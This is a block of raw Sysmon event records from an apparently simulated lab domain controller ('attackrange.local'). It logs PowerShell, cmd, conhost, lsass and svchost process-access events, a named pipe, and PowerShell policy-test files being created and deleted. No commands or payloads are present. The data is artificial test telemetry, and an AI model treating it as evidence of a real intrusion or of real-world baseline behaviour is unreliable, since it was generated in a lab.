17141700x8000000000000000939Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-CreatePipe2021-03-31 12:00:04.780{266CAFBE-6444-6064-ED02-00000000AD01}1660\PSHost.132616656047219879.1660.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 10341000x8000000000000000938Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:04.780{266CAFBE-62DD-6064-0E00-00000000AD01}10962344C:\Windows\system32\LogonUI.exe{266CAFBE-62D4-6064-0700-00000000AD01}700C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\logoncontroller.dll+2eef5|C:\Windows\System32\RPCRT4.dll+50ff4|C:\Windows\System32\RPCRT4.dll+24e40|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000937Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:04.780{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-62D4-6064-0700-00000000AD01}700C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1a375|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x8000000000000000936Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:04.780{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-62D4-6064-0700-00000000AD01}700C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000935Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:04.780{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-62D4-6064-0700-00000000AD01}700C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000934Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:04.780{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-62DD-6064-0E00-00000000AD01}1096C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+db992|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000933Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:04.780{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-62D4-6064-0700-00000000AD01}700C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000932Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:04.780{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-62D5-6064-0900-00000000AD01}784C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+796b|c:\windows\system32\lsm.dll+2b2a|c:\windows\system32\SYSNTFY.dll+15cd|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+527f8|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000931Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:04.780{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-62D5-6064-0900-00000000AD01}784C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\SYSNTFY.dll+1ad9|C:\Windows\System32\RPCRT4.dll+50ff4|C:\Windows\System32\RPCRT4.dll+24e40|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x8000000000000000930Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:04.780{266CAFBE-6444-6064-ED02-00000000AD01}1660ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_jramhoqg.zkr.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000929Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:04.764{266CAFBE-6444-6064-ED02-00000000AD01}1660ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_knj3plyv.onz.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x8000000000000000928Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:04.764{266CAFBE-6444-6064-ED02-00000000AD01}1660C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_knj3plyv.onz.ps12021-03-31 12:00:04.764 10341000x8000000000000000927Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:04.748{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6444-6064-ED02-00000000AD01}1660C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000926Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:04.733{266CAFBE-62DA-6064-0B00-00000000AD01}856584C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x8000000000000000925Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:04.733{266CAFBE-62DA-6064-0B00-00000000AD01}856584C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+19616|C:\Windows\system32\lsasrv.dll+1abbf|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000924Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:04.733{266CAFBE-62DA-6064-0B00-00000000AD01}856584C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000923Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:04.717{266CAFBE-6444-6064-EB02-00000000AD01}44364852C:\Windows\system32\conhost.exe{266CAFBE-6444-6064-ED02-00000000AD01}1660C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000922Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:04.717{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000921Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:04.717{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000920Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:04.717{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000919Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:04.717{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000918Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:04.717{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000917Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:04.717{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000916Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:04.717{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000915Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:04.717{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000914Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:04.717{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000913Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:04.717{266CAFBE-62C8-6064-0500-00000000AD01}620744C:\Windows\system32\csrss.exe{266CAFBE-6444-6064-ED02-00000000AD01}1660C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x8000000000000000912Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:04.717{266CAFBE-6444-6064-EC02-00000000AD01}50041296C:\Windows\system32\cmd.exe{266CAFBE-6444-6064-ED02-00000000AD01}1660C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
